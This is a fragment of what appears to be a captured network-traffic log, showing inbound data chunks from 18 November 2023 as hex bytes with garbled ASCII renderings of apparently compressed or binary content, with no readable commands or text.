e8 ef 86 3e 3b f4 f9 a1 67 86 5e 19 fa e5 d0 ef 86 7c c3 1d c3 a7 0f 6f 1b de 31 3c 3c 6c 0c 67 87 2f 1d be 7a f8 6b c3 df 1f be 7b f8 be e1 87 86 7f 34 bc 75 d7 d0 ae f0 2e 69 97 b2 eb 0b bb 8e ef 0a 8e ec 19 09 8d ec 1b 89 8f 5c 34 32 Data Ascii: }f{=otgG48z"R\@`k`lNg7nx"F`33?pwxrY@G^\-T+k3xoj>o!}(;tt>;g^\|o1<<lg/zk{4u.i\42
2023-11-18 09:02:39 UTC	1636	IN	Data Raw: 91 84 40 bc 1a 2e d6 52 08 c4 bf 56 eb 79 42 20 5e 03 fb 7a 21 10 3f 04 3b 19 42 20 7e 18 96 72 84 40 bc 16 16 5b 0a 81 78 1d ac e7 08 81 f8 11 e5 82 4f 57 f2 a8 92 69 ae c6 c7 94 92 20 04 e2 f5 4a 9e 21 04 e2 c7 95 a6 ee 12 db 00 5b 92 10 88 37 aa a1 24 04 e2 27 84 8a 24 04 e2 df c0 34 43 08 c4 4f c2 92 2a 04 e2 a7 f4 b9 28 04 e2 a7 61 2b 5b 08 c4 9b 60 4f 16 02 f1 33 ea 55 96 86 cf aa a1 24 04 e2 cd 6a 25 11 02 f1 73 6a 28 0b 81 f8 79 d8 c9 10 02 f1 16 e5 91 5e 74 fd f0 56 e5 c4 49 85 17 60 21 47 08 c4 2f c2 a2 2c 04 e2 6d 52 2a 0b 81 78 3b 2c 28 42 20 de a1 8b 35 42 20 7e 29 bf 18 0b 81 f8 e5 fc 5e 2c 04 e2 57 da da f0 04 03 ef 6c 67 c3 41 ef d5 76 36 1c f4 76 b5 b5 e1 7e 03 bf d6 ce 86 83 de eb ed 6c 38 e8 ed 6e 6b c3 13 0d bc a7 9d 0d 07 bd 37 da d9 Data Ascii: @.RVyB ^z!?;B ~r@[xOWi J![7$'$4CO(a+[`O3U$j%sj(y^tVI`!G/,mRx;,(B 5B ~)^,WlgAv6v~l8nk7
2023-11-18 09:02:39 UTC	1652	IN	Data Raw: 96 7d 11 2d bf 49 b2 4b 8a eb b1 65 b4 5a 2b 90 5d 28 ad 1e 5b 9e b5 ca 8a eb b1 8b 3c 66 a1 b8 1e bb c4 eb e0 8a eb b1 6e e1 48 d8 8a eb f1 d6 4a 9c ef ca 74 9a 13 1a d6 76 f5 a5 91 ed 58 53 bd 21 89 0c c8 b6 85 83 5d 4e 9f c9 91 1c 5a fe 19 7e 63 1a 9a 0e 00 5d 02 5c 96 d9 90 06 77 5d 72 7f 23 21 a1 67 1b f1 db 1e 87 97 c4 69 43 24 95 22 a4 14 1b b4 31 8a 37 2e 29 ed e4 ac cc 94 31 16 0b 35 94 ae c6 f7 ec 69 53 fd 24 2c 29 40 86 a0 b1 18 bf 8a 82 2b 83 a1 4c df 0b 89 2b b1 2f 8c 4b f3 25 42 87 37 21 3c 1c 9a 0a 43 aa 32 3b 4d 2f 9e b7 68 a5 45 a3 a7 57 51 2c c2 de d6 34 d8 f5 01 27 fb 5c dd 44 48 75 d7 ec ee 6e f3 bd 14 7a 55 1d de 7d da 8d a4 da a4 19 d3 ef 15 e1 f8 b4 1b f5 ea 3e 53 f5 96 d0 8d 43 3e e7 b6 48 cd 00 a4 42 26 5d 21 24 1a 0a c3 e9 25 f4 Data Ascii: }-IKeZ+]([<fnHJtvXS!]NZ~c]\w]r#!giC$"17.)15iS$,)@+L+/K%B7!<C2;M/hEWQ,4'\DHunzU}>SC>HB&]!$%
2023-11-18 09:02:39 UTC	1668	IN	Data Raw: 8d 81 21 6c 0c 0c 61 63 60 0a 1b 03 43 d8 18 18 c2 c6 c0 14 36 06 86 b0 31 30 84 8d 81 29 6c 0c 0c 61 63 60 08 1b 03 63 d8 18 18 c2 c6 c0 14 36 06 a6 b0 31 30 85 8d 81 29 6c 0c 4c 61 63 d0 25 6c 0c ba 84 8d 41 37 b0 31 e8 06 36 06 e6 b0 31 30 87 8d 81 21 6c 0c 8c 61 63 60 08 1b 03 73 d8 18 98 c0 c6 c0 1c 36 06 86 b0 31 e8 0a 36 06 dd c1 c6 60 99 b0 31 58 26 6c 0c 96 03 1b 83 e5 c0 c6 a0 3b d8 18 74 07 1b 83 ee 61 63 d0 3d 6c 0c de 13 d8 18 bc 4b d8 18 2c 13 36 06 ef 29 6c 0c de 23 d8 18 bc 4b d8 18 bc 4b d8 18 74 05 1b 03 73 d8 18 2c 0b 36 06 dd c3 c6 c0 04 36 06 c6 b0 31 30 87 8d 81 01 6c 0c f4 b0 31 d0 c1 c6 40 03 1b 03 13 d8 18 98 c3 c6 40 0f 1b 03 13 d8 18 18 c0 c6 40 0f 1b 03 73 d8 18 a8 61 63 60 0e 1b 03 13 d8 18 74 01 1b 03 3d 6c 0c 8c 61 63 a0 87 Data Ascii: !lac`C610)lac`c610)lLac%lA71610!lac`s616`1X&l;tac=lK,6)l#KKts,6610l1@@@sac`t=lac
2023-11-18 09:02:39 UTC	1684	IN	Data Raw: a3 d1 34 7f 5e a9 fb b8 d1 5b 60 36 7b fc 2e 87 37 49 0f 29 3d 1d 6b e7 bb bf d6 58 c2 db 50 c0 89 14 16 1a c9 d3 43 61 12 0c a1 70 52 e2 a9 4d 95 ee e3 5a b1 b7 cb f0 6a d6 6f 20 85 d8 06 25 74 6e 78 11 5e dd bd 71 86 e6 a3 3c f5 18 78 48 4f b9 41 92 62 61 ee 1d c6 85 8b 97 6c d7 33 19 89 16 77 af c6 e0 f9 3d bc 55 6e 40 31 eb cd c3 72 bd 0b b4 96 ee 50 b2 4f b8 81 59 db 0c cd bb 54 f5 ee c7 3a bb a0 ce d1 58 27 d4 78 d8 72 48 ae 53 63 68 be 1c ea a0 2f 8f df d0 fc 2a 63 2c 1a f5 3e 7c 79 0e 19 9a bd 18 ba e9 35 4c 22 a4 78 cb cc a9 81 02 b3 16 85 90 58 66 d6 c1 b7 49 4c 34 87 db dd c7 f5 ee 04 6c b7 06 30 26 cc 39 da 2d b1 9f 55 2d 0a 71 7f 03 2d 0c 24 60 6d d8 ac c7 08 3b 4a 18 1c 12 0e 87 15 92 37 b2 b7 28 ec 56 0c 7b 23 9a 32 78 1f 06 40 73 5b 10 1b Data Ascii: 4^[`6{.7I)=kXPCapRMZjo %tnx^q<xHOAbal3w=Un@1rPOYT:X'xrHSch/*c,>\|y5L"xXfIL4l0&9-U-q-$`m;J7(V{#2x@s[
2023-11-18 09:02:39 UTC	1700	IN	Data Raw: 8b c3 0b 8d c0 c3 84 5e 79 e1 e7 d9 2d a0 99 58 ab e9 b5 06 0c be 12 8d fc 0b 52 a0 03 f8 0a 66 b1 b4 8f e8 7a b7 d3 3e e1 21 26 7e 2c fe 5d 19 5f 24 97 16 5c 14 cf b8 a5 b8 bd 67 c5 e0 de 2f 86 c0 00 29 89 b3 ee 74 1d f3 e6 9a bd f8 ab 5e 7e 18 00 0f 31 c3 66 18 1e d8 c9 e3 0d 9b 8b cd 13 23 1c 8b 41 19 e2 6c 2d b0 f5 90 f7 c4 91 f8 99 8f 69 0b 30 d9 4c c3 e6 5a f3 6c 88 c2 a4 d2 90 f7 82 33 2e 70 fd 7d 0b d2 2a f8 6e e4 77 d5 80 cf 26 1b 36 a3 45 c9 88 c2 83 7c 9e 90 d1 f0 c9 7f d8 16 ba 2a e8 bb a0 4a 9f 8d ad dd 26 df b2 61 d4 c8 19 f0 fb 9d 38 25 c3 22 b9 ba 16 40 57 8b 77 75 c3 78 4c b9 df b0 79 8d 8b 69 ce 69 a0 a5 89 f7 43 6f b8 bf d1 b8 fe 51 a5 19 1e 5c 77 91 3c 12 50 de b0 e0 e6 0b 44 6c 23 f2 74 f0 16 5c 0d 06 82 5d 03 fe 9e 54 32 fe 0a 35 5d Data Ascii: ^y-XRfz>!&~,]_$\g/)t^~1f#Al-i0LZl3.p}nw&6E\|J&a8%"@WwuxLyiiCoQ\w<PDl#t\]T25]
2023-11-18 09:02:39 UTC	1716	IN	Data Raw: 71 a1 1a 17 29 34 61 84 83 81 2d 5d 15 6b 80 77 4b fe 8e 39 2c 38 dd b8 c9 41 55 65 fe da f8 d7 28 98 f9 d7 c3 f9 15 62 38 b3 06 84 2f 48 4c 67 6f d5 80 36 7e e0 ba e0 74 de 5d fc fc d3 90 e8 32 5e 7b 53 69 c3 1c de 3b 92 fd 81 b7 a8 a4 a1 95 f7 e0 64 33 a8 8e 35 dc cf 7e c2 96 ae 8c 35 bc c1 7e c2 86 87 c6 d0 97 c3 e0 bf 8a 7f d3 33 3d 49 46 9f 91 e9 49 92 57 3b 92 81 f7 20 e9 5c d8 da dd d2 bd b0 bd 67 24 fb c3 d7 68 fa d0 33 b2 a7 7b fe c8 d6 96 6e 66 ef 1e 60 5b 12 23 44 a6 5d d2 57 9e 6c 63 12 7b 27 12 47 13 12 6d 62 f0 b8 dc 84 44 5b 50 92 c8 d9 84 44 4f d8 9a 90 78 c6 e4 d3 84 44 5b 83 eb 3a b9 16 7f b7 5b 13 12 ed 4d 1c 2e 82 2b 3e 09 37 b2 6d 98 1c 77 34 21 d1 b6 e3 f0 21 45 13 12 6d 87 b0 cb 4d 48 b4 9d 38 d2 24 35 21 d1 de c1 f4 16 47 13 12 6d Data Ascii: q)4a-]kwK9,8AUe(b8/HLgo6~t]2^{Si;d35~5~3=IFIW; \g$h3{nf`[#D]Wlc{'GmbD[PDOxD[:[M.+>7mw4!!EmMH8$5!Gm
2023-11-18 09:02:39 UTC	1732	IN	Data Raw: 98 72 9e 19 53 ce 33 63 ca 79 e6 4c 39 cf 9c 29 e7 df 0b 53 ce bf 23 53 ce 07 c9 94 f3 ef 95 29 e7 df 13 53 ce bf 23 53 ce bf 23 53 ce 33 62 ca b9 7b a6 9c 0f 8a 29 e7 99 33 e5 dc 0d 53 ce 5d 33 e5 76 96 3a 53 6e 62 ca b9 0b a6 9c a7 67 ca 79 3a a6 9c a7 61 ca b9 1b a6 9c bb 67 ca 79 7a a6 9c bb 61 ca b9 0b a6 9c a7 67 ca b9 7b a6 9c 3b 33 e5 dc 3d 53 ce dd 30 e5 3c 03 a6 9c a7 67 ca b9 6b a6 9c a7 67 ca 79 5a a6 9c a7 65 ca 79 5a a6 9c bb 61 ca b9 0b a6 9c bb 60 ca b9 4b a6 1c ed 22 06 a6 fc 6e a4 b7 75 a6 5c 3c f3 88 ea 4c b9 fc 4a 3f ce 94 a3 d2 1f 8d 33 e5 a8 0d 46 e3 4c 39 5e 86 a3 46 a6 5c 7c 29 1d 35 30 e5 28 28 8c 26 31 e5 4b 93 99 f2 20 34 26 84 2d 1a 28 95 8f 0b 92 98 f2 97 4b f1 cb fa 47 4a f1 0b 6b 23 53 7e c4 89 29 0f 89 66 97 a9 2f 8c b1 a8 Data Ascii: rS3cyL9)S#S)S#S#S3b{)3S]3v:Snbgy:agyzag{;3=S0<gkgyZeyZa`K"nu\<LJ?3FL9^F\\|)50((&1K 4&-(KGJk#S~)f/
2023-11-18 09:02:39 UTC	1748	IN	Data Raw: b1 3b 55 d0 99 ad 06 b1 dd 2a be 0f 56 83 d8 5d 6a 80 30 ab 41 ec ee 48 a6 49 9c f7 44 a2 22 ad 06 b1 3d 26 a8 5e ad 06 b1 7b 23 d1 aa d5 20 b6 37 92 6f 62 d2 85 dd a7 c2 22 ac 06 b1 6e 95 dd 27 ab 41 ec fe be 05 09 b3 1a c4 f6 a9 c1 ce 68 35 88 fd 25 12 1e cd 6a 10 7b 40 c5 9b 5b 0d 62 0f aa 98 5e ac 06 b1 87 54 50 14 ab 41 ec 61 15 78 46 ab 41 ec 11 15 1e c5 6a 10 7b 34 a2 c1 07 85 3c 16 c1 33 69 8d 8f 47 80 42 ac 06 b1 fd 11 fc 5e ac 06 b1 27 22 90 66 4d ec 49 15 15 66 35 88 fd 35 92 19 66 35 88 3d 15 02 09 b3 1a c4 0e a8 dc 5e ac 06 b1 a7 55 50 a4 d5 20 f6 8c 39 3f d4 6a 10 7b 56 45 f5 6e 35 88 fd 4d c5 85 5b 0d 62 cf 45 b6 b2 20 f3 f9 48 66 98 d5 20 f6 42 24 24 60 35 88 bd 18 c9 0c b7 1a c4 5e 52 31 bd 58 0d 62 2f 47 8c f4 a1 b6 7e d8 c1 88 8a 0b 03 Data Ascii: ;U*V]j0AHID"=&^{# 7ob"n'Ah5%j{@[b^TPAaxFAj{4<3iGB^'"fMIf55f5=^UP 9?j{VEn5M[bE Hf B$$`5^R1Xb/G~
2023-11-18 09:02:39 UTC	1764	IN	Data Raw: c9 65 61 b3 c3 00 b3 59 ff 5c 4c f3 fa 94 9c 40 2f b2 56 a6 76 f4 48 49 6c 08 ed 1b 5d 21 45 b5 c0 6f c8 61 56 8c bb f9 45 70 48 77 b9 ba 44 cc 27 f1 ab db db ca a5 fd 9a b3 2f c8 01 d2 08 fe 81 5f d6 86 b5 8b 4c 6d a9 41 5a a9 6f 73 9f 01 c8 e6 1b f3 25 e2 eb c6 3e 69 08 b5 8f f0 ad eb 37 dc a4 52 f0 b0 62 7a 0a f9 fe be 9f 6b bb ea d5 40 ae 9b 7d 65 68 bb fe ac d6 00 2a a5 c9 a5 66 8d 75 64 6a 4d af e7 9b 42 a0 a8 a8 35 6d 45 6d 35 8a 40 49 e1 1a 45 98 0c 06 9a 25 e0 d1 b5 d1 c0 35 7c 5b 14 c1 09 14 e8 ed 96 a2 71 32 d0 0f bc 80 ad 30 12 f0 32 87 d0 5d 2d d6 f3 cd c2 02 0a 54 7a 0c e5 a2 0d a1 03 e3 7c 4d 83 1f 32 09 ac a3 c0 6d 46 33 4b f5 45 4e 89 99 44 7b 75 af c1 4e 53 7a 7d bf d9 4a c8 bf 73 1b a3 a4 2f 23 d1 b5 98 45 14 70 f0 6b f5 51 d2 7f 35 58 Data Ascii: eaY\L@/VvHIl]!EoaVEpHwD'/_LmAZos%>i7Rbzk@}eh*fudjMB5mEm5@IE%5\|[q202]-Tz\|M2mF3KEND{uNSz}Js/#EpkQ5X
2023-11-18 09:02:39 UTC	1780	IN	Data Raw: 82 9f 4c 3e 1f 2f 6a 0a 59 d4 7d 7a cb 35 67 68 da fe af e0 ea 06 2c af c3 7f fb 3f 85 9f 5c 8c ff 73 11 79 72 1f 7e f2 73 fc 9f 6b ff 8f b9 2b 8f 8e a2 4a f7 b7 aa ab f3 75 77 3a 90 a5 93 74 87 24 9d 90 80 88 22 6b 70 c1 e7 00 82 c8 0c 4b 24 20 fa 94 49 02 69 20 43 12 98 04 f0 e1 38 47 3c 20 a8 cc 9c 33 8e 6f ce 51 8f ef a9 67 54 7c e3 ae 11 41 51 16 71 f7 09 2e e3 86 0b 2e 3c 1d 9d 61 e6 e9 b8 8c 22 be ef bb b7 aa eb 56 d5 ad ea 86 79 7f f8 47 35 55 df f7 fb ee bd 75 b7 6a 52 bf fe 7d 78 9c 64 05 1b f4 11 25 69 ed 02 4d e3 c1 0f a3 7b ab 15 bc 0f 4f 5e b0 82 3f c1 93 8f f1 18 79 06 c6 9c 88 27 a3 b4 66 bd 8f 31 b3 2d 07 a8 2d cd d4 96 dd 5a fc 84 0b cc b6 7c 8f b8 ef ac e2 ca 5b e9 79 63 16 37 92 4e 5a cd b6 50 b0 41 1f 25 72 5b a6 a0 7b 72 ab 19 fc af Data Ascii: L>/jY}z5gh,?\syr~sk+Juw:t$"kpK$ Ii C8G< 3oQgT\|AQq..<a"VyG5UujR}xd%iM{O^?y'f1--Z\|[yc7NZPA%r[{r
2023-11-18 09:02:39 UTC	1796	IN	Data Raw: e0 8f e6 22 ae c8 1f c9 33 b9 1a 77 14 bf c8 95 c4 23 b8 98 ab 0a 47 ef 2c ae c8 1f b9 b3 b9 1a 3c 6a 4b 14 1b 51 ab f6 73 55 fe 78 9e c3 d5 b8 83 b5 94 2f 29 0e d4 32 69 b7 56 e7 3b 00 4b 82 7e 8f bb e1 9b 33 a8 df e3 9f c3 0a a7 df e3 d6 06 a1 c4 fe 13 00 f7 8b a3 82 7e 8f 5f 6e 34 36 1c 4e d7 f5 05 f8 8e 8f d3 ef f1 b5 39 4d 89 4d b7 03 16 79 fd 1e 9f de a4 ab f5 a6 f0 93 da e2 94 14 3e 00 be 35 94 f5 7b fc 80 50 17 f5 7b dc 0e df 44 42 fd 1e 5f 0c 2b 4c bf c7 99 11 fc 48 ed 63 12 be a3 99 2f 55 f4 7b fc 91 ba 50 79 c7 87 4f f7 e4 0d 08 df d8 e1 0d 9e b0 dd d5 df 50 c0 fb f9 a0 24 ea f7 f8 3f 35 d5 aa 7e 8f 71 ab dc 01 f4 7b 7c 9e b1 4e 8f c9 d3 71 03 a7 df e3 7d 83 62 6d b2 da f0 41 f0 dd 70 55 bf c7 67 e4 15 c3 55 fd 1e af 37 95 d9 09 b5 5b 9b a2 81 Data Ascii: "3w#G,<jKQsUx/)2iV;K~3~_n46N9MMy>5{P{DB_+LHc/U{PyOP$?5~q{\|Nq}bmApUgU7[
2023-11-18 09:02:39 UTC	1812	IN	Data Raw: cd 4e 15 69 72 a9 68 08 d8 24 86 3b a1 29 66 5b 39 81 4c 0a cd 34 b5 c1 d4 65 f6 95 b8 9b 9f 34 a7 a4 b5 43 f4 30 8d e3 df f7 05 f0 b3 99 56 be 66 29 d1 46 fc cb 2f ed 13 41 a5 64 db b6 41 6c ea ee 08 85 41 51 3c 46 94 15 c0 7d 5e a8 af 13 dc 90 ce 77 bc 53 fc 2a 38 c0 1d c3 b6 69 17 44 53 9d a7 b8 54 4a 8c 9f cd 0e b7 91 fe c2 7e e7 ea 97 f7 51 b4 66 ba 7e 36 c2 08 b5 e6 d0 ed 8e 13 d4 22 18 ef f4 f6 90 1c b8 65 a2 6e 19 11 98 1f 0a fa 02 f3 3a de e3 bf b5 2f 4c 86 a1 a5 d7 7f a0 ac a0 98 07 59 c9 f2 5f 4c 06 5f 61 14 c7 e7 8e e0 ae 42 d6 ff 6b ac 8f 58 29 e0 0d 80 53 a1 d8 da ff ca 7e c5 b8 bd 2f 3b fc e8 a6 64 e1 02 cf c4 d6 e7 e7 ac f7 6b d0 5a 02 5f 66 6a 7d 53 85 a9 15 79 fe e1 01 72 b0 b0 24 25 5e d7 df f2 2a 99 e4 39 e8 73 7c 7f 6b 4a ec 17 29 56 Data Ascii: Nirh$;)f[9L4e4C0Vf)F/AdAlAQ<F}^wS8iDSTJ~Qf~6"en:/LY_L_aBkX)S~/;dkZ_fj}Syr$%^9s\|kJ)V
2023-11-18 09:02:39 UTC	1828	IN	Data Raw: 0d 50 ca 5c c0 20 e6 0e 72 f5 94 27 03 18 c5 dc 51 92 4b 81 f2 58 ab e4 78 6d 5a 16 30 d9 3c f3 83 5a f6 9d 56 c9 4d e4 99 c1 44 4b bd da 52 8f 5d 25 37 5a 96 a1 01 27 f1 e4 6b 92 e8 63 11 ab 28 07 9f 8c 70 9c 24 ba 22 b4 88 c9 0e 91 8f 2d 2a 7e e5 59 c3 89 6b 82 3f 2e fd d9 14 16 d4 47 9c f0 91 2c 8c 0b 36 4e c2 32 f6 a4 78 06 dc c6 4a 80 17 39 8f 17 45 3f ee d7 d2 5f 53 21 9e e7 26 01 7c cc 0d 05 d8 6f ba 03 a8 11 09 95 50 58 bd fa 79 b3 cc 32 f7 89 a8 63 75 bf d1 8d 1d b1 b1 70 75 03 5f c7 80 9d 7c 75 ef 94 f7 7a 9c fd 2e b3 fe 36 0b f8 94 c5 01 4e e8 f5 aa 32 e7 a8 37 8d 5f 55 8c 70 1c bb ae 5c ce ec 39 f9 35 19 b8 9d 17 c9 ee 12 a5 60 f5 7c 21 dc c0 03 5f 8b cc 83 c3 8f bc 10 a9 13 7e 9d 44 ca 0e 4d c9 a6 fd 63 11 de 0f 30 58 84 06 73 b0 01 38 80 20 Data Ascii: P\ r'QKXxmZ0<ZVMDKR]%7Z'kc(p$"-*~Yk?.G,6N2xJ9E?_S!&\|oPXy2cupu_\|uz.6N27_Up\95`\|!_~DMc0Xs8
2023-11-18 09:02:39 UTC	1844	IN	Data Raw: 7d 91 58 2d 96 26 2b 12 d3 ea 96 50 bc 87 27 ad b5 44 7e b2 bc b0 ee 0e 24 13 0e 71 14 b3 f9 13 c7 7b 6f 31 cf b4 d6 e0 bc 82 5e 72 b4 37 c1 d5 72 23 13 40 4c a3 d7 da 23 f4 99 96 88 2c d7 76 de 54 67 f4 32 de 28 2d 7b 5c 4d 54 ca 08 e7 c2 59 ca 77 3e 08 f5 0b f8 9a cd fc 71 39 be 1c 03 5e 16 bf e4 e9 28 c1 07 e5 32 e3 41 6f 40 eb 55 0c b2 da 83 cc d8 5f e3 3f c0 88 fe 9a 3f a3 3d 3a d6 cc 21 ad 3a 79 02 ff e7 6c 1b 8b c0 b7 23 88 32 22 01 e4 9c cc 9c 26 d3 75 61 66 5e 16 78 af 62 ef c5 5c 3f 69 e8 88 d8 82 36 f0 51 ad e3 16 ad 0b 9a 9d 3c 61 a9 d8 66 d9 20 38 2c f3 1e 09 fd c0 7d 26 c6 1a 15 65 a3 aa 22 62 dd ce 03 2e 0c ee dc 9f 27 f9 43 00 21 ae 3b 6b db 73 e4 cb ca 7e 9a d6 d1 71 1d 6d 22 b8 41 59 db 90 d7 0f c9 c5 6d eb 28 e5 25 2b f8 00 b9 33 76 5d Data Ascii: }X-&+P'D~$q{o1^r7r#@L#,vTg2(-{\MTYw>q9^(2Ao@U_??=:!:yl#2"&uaf^xb\?i6Q<af 8,}&e"b.'C!;ks~qm"AYm(%+3v]
2023-11-18 09:02:39 UTC	1860	IN	Data Raw: fa 6c 19 10 e5 da d8 97 63 75 93 8a af d3 22 15 64 d0 58 29 69 9a 2f 96 00 e9 3e 91 74 1a 1f f4 3b 6d 2e f1 6b f1 83 fa d0 83 94 be 79 15 29 ac ec 48 b1 6d 81 05 50 41 1e a8 54 7e 20 30 16 14 fd c1 05 57 81 54 b0 94 b6 e4 fc 97 70 89 a0 5c 95 e4 11 71 ea 17 09 56 2a 19 6a 86 4f 60 cb ca 7f 51 17 0c 04 19 61 6b 0c 29 f7 25 12 8d cf 8a 25 40 84 cc 82 2c fc a3 c1 5a 90 83 7f 34 5a cd 79 f0 8d 33 6f 81 18 c8 e6 42 30 3b 9a 8b 30 dd 75 31 bc 68 2e 81 b7 cc af 63 0c d1 3d f8 7c 29 3e 5f 81 cf 57 e2 f3 55 f8 7c 75 3e 36 d0 c7 86 3f f7 63 67 06 17 0d 80 d9 a4 1f 0a 2b d6 17 43 bc 61 cf e2 e7 c1 86 37 f9 f9 f7 ce d7 b5 1c ec 64 46 08 1f 5e 43 35 15 24 ee 0f 39 43 be 85 c6 46 fa 2d ec a5 11 8f e0 17 1f 23 c7 6c 95 4e a1 7e 87 96 e6 4a c8 55 67 2b 2d de c1 ad 3d f8 Data Ascii: lcu"dX)i/>t;m.ky)HmPAT~ 0WTp\qV*jO`Qak)%%@,Z4Zy3oB0;0u1h.c=\|)>_WU\|u>6?cg+Ca7dF^C5$9CF-#lN~JUg+-=
2023-11-18 09:02:39 UTC	1876	IN	Data Raw: dd d7 41 f7 50 d5 97 e8 8e 44 77 b1 87 05 ad 7b f9 7a 9f db f9 3e 6f 71 f6 6d 13 b3 6f 61 52 6d ce be c1 d9 37 75 66 df 40 55 53 ce be 26 67 5f c7 1e 16 b4 ba 5d 3f f0 15 a2 ab 26 d0 15 b4 58 25 ba 44 74 59 07 5d 42 55 59 a2 0b 12 5d c4 1e 16 b4 a2 5d e8 1c d1 79 13 e8 1c 5a cc 13 9d 21 3a ab 83 ce a0 2a 2b d1 29 89 4e 63 0f 0b 5a da 2e 74 82 e8 a4 09 74 02 2d 26 89 8e 11 1d d7 41 c7 50 15 97 e8 88 44 47 b1 87 05 2d 6a 17 3a 44 74 d8 04 3a 84 16 c3 44 07 88 0e ea a0 03 a8 0a 4a b4 4f a2 fd d8 c3 82 e6 bf fc 0f f7 35 7a 2e bc b0 e8 22 ee 6b f4 20 d5 7b b1 f7 be 46 17 1f ec be e0 1b 74 17 7c 83 ee 62 cd 65 46 0f bc cc e8 01 5f 6b 7b c0 d7 da 1e 2c 09 7f 61 f8 2b c2 5f 10 fe 6a 4d f8 85 e1 57 84 5f 10 7e b5 26 fc c4 f0 33 c2 4f 08 3f 3f 7c d2 b5 5e 07 3e fe Data Ascii: APDw{z>oqmoaRm7uf@US&g_]?&X%DtY]BUY]]yZ!:*+)NcZ.tt-&APDG-j:Dt:DJO5z."k {Ft\|beF_k{,a+_jMW_~&3O??\|^>
2023-11-18 09:02:39 UTC	1892	IN	Data Raw: 65 d7 39 0a 74 14 e1 28 c0 51 74 9d 23 47 47 1e 8e 1c 1c 79 d7 39 32 74 64 e1 c8 c0 91 75 9d 23 45 47 1a 8e 14 1c 69 d7 39 12 74 24 e1 48 c0 91 74 9d 23 46 47 1c 8e 18 1c 71 d7 39 22 74 44 e1 88 c0 11 75 9d 23 44 47 18 8e 10 1c 61 d7 39 02 74 04 e1 08 c0 11 74 9d c3 47 87 1f 0e 1f 1c 7e d7 39 3c 74 78 e1 f0 c0 e1 75 9d e3 f5 1b ef fb fd 86 af 83 7f c3 d7 c1 bf b9 ee be 5f 3a 5e e0 78 86 e3 c5 75 8e 27 3a 2e 70 3c c1 71 71 9d e3 44 c7 19 8e 13 1c e7 6f 5f f7 35 da ff be e9 d3 dd c7 bb 69 97 bb ff fd dd b4 27 fc 05 e4 e5 ee e3 dd b4 d3 dd c7 bb 69 e7 7f ff 6b cd ef 27 54 9d ef f8 6e da e1 8e ef a6 1d b1 87 05 e5 78 67 d3 0b 79 3b a2 f7 26 d0 3b b4 b8 27 7a 43 f4 56 07 bd 41 d5 56 a2 57 12 bd c6 1e 16 94 b5 5d 68 95 68 cd 04 5a 45 8b 1a d1 0b a2 97 3a e8 05 Data Ascii: e9t(Qt#GGy92tdu#EGi9t$Ht#FGq9"tDu#DGa9ttG~9<txu_:^xu':.p<qqDo_5i'ik'Tnxgy;&;'zCVAVW]hhZE:
2023-11-18 09:02:39 UTC	1908	IN	Data Raw: ff 9b 4b d3 dc e8 d2 74 6b bc 21 f3 f6 d2 df 6e 8d d7 e6 63 57 97 34 3e ba a4 f1 d1 e5 66 1a 1f 99 e8 25 d1 0b a2 97 9b 89 9e 99 e8 39 d1 33 a2 e7 9b 89 1e 9b e8 09 d1 63 a2 27 9b 89 1e 9a e8 11 d1 43 a2 47 97 bf a9 e5 57 df 7c f8 80 0f ef f3 e1 83 cd b8 ba 26 ba 47 74 97 e8 de 66 a2 db 26 ba 43 74 9b e8 ce 66 a2 9b 26 ba 45 74 93 e8 d6 66 a2 eb 26 ba 41 74 9d e8 c6 ef 2a 74 d5 7c 78 8d 0f af f2 e1 b5 cd b8 ca 26 ba 42 74 99 e8 ca 66 a2 8b 26 ba 44 74 91 e8 d2 66 a2 f3 26 ba 40 74 9e e8 c2 66 a2 cf 4c 74 8e e8 33 a2 73 bf ab d0 19 f3 e1 59 3e 3c c3 87 67 37 e3 3a 35 d1 69 a2 4f 89 4e db e8 ff 57 93 54 13 7d 42 f4 31 d1 27 9b 89 3e 32 d1 29 a2 8f 88 4e 6d 26 fa d0 44 27 89 3e 24 3a f9 bb 0a 7d 60 3e 3c c1 87 1f f0 e1 89 cd b8 62 26 3a 4e 74 8c e8 f8 66 a2 Data Ascii: Ktk!ncW4>f%93c'CGW\|&Gtf&Ctf&Etf&At*t\|x&Btf&Dtf&@tfLt3sY><g7:5iONWT}B1'>2)Nm&D'>$:}`><b&:Ntf
2023-11-18 09:02:39 UTC	1924	IN	Data Raw: 07 a5 dd b4 06 44 30 83 5a cc 74 49 1c 67 a9 ac c9 6e 65 d1 4d 23 81 98 b1 5a 51 64 70 c0 60 03 42 b8 d4 f6 ac 84 6a ab a9 87 08 e3 a6 22 63 60 49 3d a9 6c 0b 50 ca 1f ad 6d ed ba ef 9e 7b df 7b e7 9c 77 ef 7a 97 76 a6 7c e0 8b b4 f7 be 73 ce 3b ef 77 7f f7 bc f7 ee 79 ef 3c 78 ec 77 8a 3c f6 3b 25 1f fb 5d 0b 4e ad c3 0f 80 e2 c7 5b ff 0f 27 4d 1f d8 82 e7 a0 32 61 f9 1f 1e e9 84 eb 9a 1a a7 c3 79 97 cb ed 68 90 23 ee 75 84 25 e0 5e 47 93 e4 bd d7 11 91 84 f3 3a 9a e5 48 7b 1d cb d5 43 9f b2 d5 02 0f 7d 66 c5 c7 f1 9d c7 b8 de 7d a7 d6 7a 68 5c 3c bc 75 bb f8 f6 a8 f7 3c d7 49 e7 b3 38 2d 45 e7 1b c2 45 fa 18 17 9c 77 c5 27 0b c4 7f d9 12 4f 4c dd 88 9a b6 fa 2a d4 6c 90 c9 2e a7 19 ce 74 ad 41 cd 26 99 cb 72 9a 91 4c d7 3a d4 6c 96 a9 2a a7 b9 3c d3 b5 Data Ascii: D0ZtIgneM#ZQdp`Bj"c`I=lPm{{wzv\|s;wy<xw<;%]N['M2ayh#u%^G:H{C}f}zh\<u<I8-EEw'OLl.tA&rL:l<
